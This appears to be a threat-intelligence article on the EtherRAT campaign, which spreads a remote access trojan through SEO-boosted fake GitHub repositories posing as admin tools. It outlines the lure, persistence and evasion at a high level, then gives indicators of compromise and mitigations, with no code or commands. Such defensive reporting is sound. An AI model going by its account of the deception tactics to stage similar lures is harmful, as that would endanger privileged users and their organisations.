EtherRAT Malware: How Attackers Use Fake GitHub Repositories to Target Sysadmins and DevOps

Introduction

In March 2026, the Atos Threat Research Center (TRC) uncovered a sophisticated malware campaign that combines social engineering with technical deception. Dubbed EtherRAT, this remote access trojan is being distributed through carefully crafted GitHub repositories that impersonate legitimate administrative tools. The attackers specifically target high-privilege professionals such as enterprise administrators, DevOps engineers, and security analysts, exploiting their reliance on trusted utilities to gain initial access and maintain persistence.

The EtherRAT Campaign: A Sophisticated Threat

EtherRAT is not just another remote access trojan; it represents a new level of operational security and resilience. The malware is designed to evade detection by traditional antivirus solutions and employs advanced encryption and obfuscation techniques. The campaign leverages the reputation of GitHub as a trusted code repository, creating fake profiles and projects that mimic well-known administrative tools like sysinternals, puppet, or ansible scripts.

Key Characteristics

• SEO Manipulation: The attackers integrate search engine optimization (SEO) tactics to ensure their malicious repositories appear at the top of search results when users look for administrative utilities.
• Fake Credentials: The GitHub accounts are often adorned with realistic commit histories, stars, and forks to simulate trustworthiness.
• Multi-Stage Payload: The initial download triggers a chain that downloads the main EtherRAT binary from a command-and-control server.

How the Attack Works: Impersonating Trusted Administrative Tools

The attack begins with the victim searching for a specific administrative tool, such as a network scanning utility or automation script. The attackers have created dozens of GitHub repositories that appear exactly like the real ones, including identical descriptions, documentation, and even similar repository names. For example, a fake repository might be named sysinternals-ps or ansible-windows-update.

Once the victim lands on the fake GitHub page, they are presented with a convincing README file that includes installation instructions and release notes. The download link points to a .zip or .ps1 file that, when executed, triggers the EtherRAT installation. The malware then establishes persistent access, often by creating scheduled tasks or registry run keys.

The Role of SEO and Fake GitHub Repositories

SEO manipulation is central to the campaign's success. The attackers employ keyword stuffing, backlinking from compromised sites, and fake reviews to boost the repository ranking. Many victims are security professionals who should know better, but the sheer volume of fake repositories and the polished presentation often bypass scrutiny.

“We observed over 200 distinct GitHub accounts involved in this operation, with many sharing identical code templates and communication patterns,” reports the Atos TRC team.

Target Audience: High-Privilege Users

EtherRAT specifically targets accounts with elevated permissions. Enterprise administrators, DevOps engineers, and security analysts are prime targets because they have access to critical systems and sensitive data. By compromising these accounts, attackers can move laterally within the network, escalate privileges, and deploy additional malware such as ransomware or keyloggers.

Technical Analysis and Detection

The EtherRAT binary is a .NET compiled executable with strong obfuscation using ConfuserEx. It uses AES-256 encryption for C2 communication and employs a polymorphic algorithm to change its signature after each execution. Detection can be challenging, but there are indicators of compromise (IoCs) that security teams can monitor:

• Unusual GitHub Account Patterns: Look for new accounts with very recent activity but high follower counts.
• File Hashes: The malware has known SHA256 hashes (available in the full Atos TRC report).
• Network Traffic: Communication to unusual TLS endpoints with self-signed certificates.

Detection in Enterprise Environments

Security teams should enable logging for PowerShell execution and monitor for suspicious script downloads from GitHub. Tools like Wireshark and YARA rules can help identify the specific payload.

Mitigation and Best Practices

To defend against EtherRAT and similar campaigns, organizations should adopt the following measures:

1. Verify GitHub Repositories: Always check the contributor history, star count, and organization affiliation before downloading tools.
2. Restrict Script Execution: Use Group Policy to limit PowerShell script execution to signed scripts only.
3. Implement Application Whitelisting: Allow only approved administrative tools to run in sensitive environments.
4. User Education: Train high-privilege users to spot fake GitHub repositories and phishing pages.

Conclusion

The EtherRAT campaign highlights the evolving tactics of cybercriminals who exploit trust in open-source platforms. By impersonating administrative tools and using SEO manipulation, attackers have created a low-risk, high-reward method for compromising high-value targets. Organizations must remain vigilant, continuously monitor for suspicious GitHub activity, and reinforce security hygiene among privileged users.

For further reading, see the full report from Atos Threat Research Center (March 2026).